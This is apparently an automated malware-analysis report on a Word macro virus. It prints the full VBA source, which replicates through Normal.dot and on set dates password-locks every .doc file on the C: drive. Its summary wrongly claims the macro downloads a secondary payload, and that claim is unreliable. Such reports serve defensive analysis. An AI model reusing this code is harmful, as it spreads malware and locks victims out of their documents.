Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d169927a3e99eba…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 2002-07-29 16:00:00
Authoring application: Microsoft Word 8.0
First seen: 2018-02-19
MD5: 6156b98d1a645a45d9ed1a59101af1e3
SHA-1: 5f864342e124b2a75cf8c6ec52ee6b9c621fbab9
SHA-256: 9d169927a3e99eba79e7ae903134a30308b7988ea2a511eb435045cc684af4d5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro attempts to copy itself to other VBA projects and has logic that executes based on specific dates, suggesting it's designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Eight941-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Eight941-1
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2480 bytes
SHA-256: 5a3c6a2bd95f7fc34d91f3116ed3c9a573ea514f6824462a27c711531ae22d8e
Detection
ClamAV: Doc.Trojan.Eight941-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo 0
Dim i, j As Integer
j = -1
For i = 1 To Application.VBE.VBProjects.Count
    If Application.VBE.VBProjects(i).Name = "Normal" Then
        j = i
    End If
    If Application.VBE.VBProjects(i).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = False Then
        Dim B, l As Integer
            If j > 0 Then
                If Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 100) = True Then
                    B = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Application.VBE.VBProjects(j).VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Application.VBE.VBProjects(j).VBComponents(1).CodeModule.Lines(B, B + l)
                Else
                    B = Me.VBProject.VBComponents(1).CodeModule.ProcStartLine("Document_Open", vbext_pk_Proc)
                    l = Me.VBProject.VBComponents(1).CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                    Application.VBE.VBProjects(i).VBComponents(1).CodeModule.AddFromString Me.VBProject.VBComponents(1).CodeModule.Lines(B, B + l)
            End If
        End If
    End If
Next i
If (Month(Date) = 11 And Day(Date) = 10) Or (Month(Date) = 7 And Day(Date) = 1) Then
Set fs = Application.FileSearch
    fs.LookIn = "c:\"
    fs.FileName = "*.doc"
    fs.SearchSubFolders = True
    If fs.Execute() > 0 Then
        For i = 1 To fs.FoundFiles.Count
            On Error GoTo Exitsub
            Documents.Open FileName:=fs.FileSearch, ConfirmConversions:=False, ReadOnly:=False, AddToRecentFiles:=False
            Options.AllowFastSave = True
            Options.BackgroundSave = True
            Options.CreateBackup = False
            Options.SavePropertiesPrompt = False
            Options.SaveNormalPrompt = False
            ActiveDocument.Password = "xyz"
            ActiveDocument.Save
            ActiveDocument.Close
Exitsub:
        On Error GoTo 0
        Next i
    End If
End If
End Sub